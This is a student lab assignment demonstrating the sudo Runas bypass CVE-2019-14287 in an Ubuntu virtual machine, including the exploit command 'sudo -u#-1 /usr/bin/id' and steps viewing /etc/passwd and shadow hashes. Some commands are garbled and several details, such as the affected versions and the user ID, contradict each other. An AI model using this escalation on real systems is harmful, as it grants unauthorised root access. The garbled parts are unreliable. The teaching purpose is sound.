OHTS ASSIGNMENT

A.G.Malanga Mishad Vishwajith Thilakarathna.

IT16035836

BSc (Hons) in Information Technology Specializing in Cyber Security

Department of Information Technology

Sri Lanka Institute of Information Technology

Sri Lanka

MAY 2020

Table of Contents

WHAT IS SUDO? 3

SUDORE FILE 3

How to setup attack 3

Vulnerability details 4

Brief description of vulnerability 4

DEMONSTRATION OF EXPLOTING THE VULNERABILITY 5

REFERENCES 13

Figure 1: the command to check the sudo version 1

Figure 2: checking the passwd file: command 2

Figure 3: shows the password file 2

Figure 4: hash file 3

Figure 5: hash values 3

Figure 6: making a new user 4

Figure 7: user will get a password 5

Figure 8: user ID checking 5

Figure 9: accessing sudo's file 6

Figure 10: user privileges 7

Figure 11: ID command user privilege denied 7

Figure 12: sudo command user privilege denied 8

Figure 13: root user ID 9

Figure 14: exploiting vulnerability 9

WHAT IS SUDO?

Sudo, abbreviated for Super User Do, is a program for UNIX and Linux systems that gives the user the permissions needed to run commands and scripts as the root of the system and logs all the commands and arguments. A sudo system administrator can:

• Give permissions for users to run root commands of the system operation
• Control the commands a user can use of each host
• See the commands used by the users via a log
• Control the time duration given for each user to enter commands after logging through the use of timestamp files

SUDORE FILE

This is a file located at /etc/sudoers which controls the sudo command privileges within users, which includes elevated privileges. The best and safest way to edit this is by using the visudo command. This command allows you to edit and save the file by using vi editor. This will also put a filelock on the file to prevent other users from editing it. Once editing is done, it will parse the file for simple errors [2]

How to setup attack

1. Download Ubuntu 16.4 from a secure website, most commonly used is oxboxes.org [3]
2. Install virtual box from the website
3. Open virtual box and add a new machine
4. Give a name to your virtual machine
5. Set the file path to the image
6. Give type as linux
7. Set version as your downloaded file whether 64bit or 32bit
8. Set RAM size and create

Vulnerability details

• Release date: 14th October 2019
• CVE ID: CVE-2019-14287
• Affected Versions: Versions prior to <= 1.8.28
• https://www.sudo.ws/alerts/minus_1_uid.html

Brief description of vulnerability

Even though user permissions in the sudoer file mentions that it explicitly prevents users running commands as root, the security bypass vulnerability allows the users with Linux systems to execute commands as root.

A user which as ALL permissions in the Runas specifications can execute these commands on any or all the users of the system.

This vulnerability allows the users to specify their user ID as -1 or the unsigned equivalent of -1: 4294967295 and this allows the users to run commands and tools as root.

sudo -u#-1 /usr/bin/id or the unsigned equivalent of -1 sudo -u#4294967295 /usr/bin/id

DEMONSTRATION OF EXPLOTING THE VULNERABILITY

Figure 1: the command to check the sudo version

• This demonstrates the command to check the sudo version.
• This shows that the sudo versions affected are version 1.8.16 and earlier.

Figure 2: checking the passwd file: command

• In linux systems there is a separate file for passwords. The command to check this password file is cat/etc/passwd. The password that is stored in the file is denoted with a letter X

Figure 3: shows the password file

Figure 4: hash file

• The hash values of the aforementioned passwords are found in the shadow file

Figure 5: hash values

• This shows the hash value of the password belonging the user called "osboxes"

Figure 6: making a new user

• To make the attack demonstration easier, I will be making a new user.
• s /bin/bash ohtsassignment

Figure 7: user will get a password

Figure 8: user ID checking

• The password file will be rechecked, and we can then notice that the user id has been increased by 1. In the linux system there are 2 user ID assigning methods. The System users will get user IDs greater than 0 less than 1000, and the user accounts will get greater than 1000. The user ID of the root will always be 0.

Figure 9: accessing sudo's file

• We are now going to access sudo's file. The command is as follows:

Figure 10: user privileges

Vsudo vipsudo

• Inside sudo's file you can find user privileges, the commands that the users can and can't use

Figure 11: ID command user privilege denied

• The new privilege for user named ohts assignment to execute the ID command will be removed

Figure 12: sudo command user privilege denied

• It is now demonstrated that even if the ohts user executes the sudo commands, it will be denied

Figure 13: root user ID

• The user ID of the user named OHTS assignment is 10001. The user ID of root is zero. Even if the use the root and try to run the ID command, it will be denied

Figure 14: exploiting vulnerability

• I will now exploit this vulnerability. I will now be using user ID -1, which will bypass and give me access to all privileged. Accordingly, I can run the commands run denied to user ohts assignment by using the user id as -1

REFERENCES

1. https://searchsecurity.techtarget.com/definition/sudo-superuser-do
2. https://linuxacademy.com/blog/linux/linux-commands-for-beginners-sudo/
3. https://www.osboxes.org/ubuntu/
4. https://www.virtualbox.org/wiki/Downloads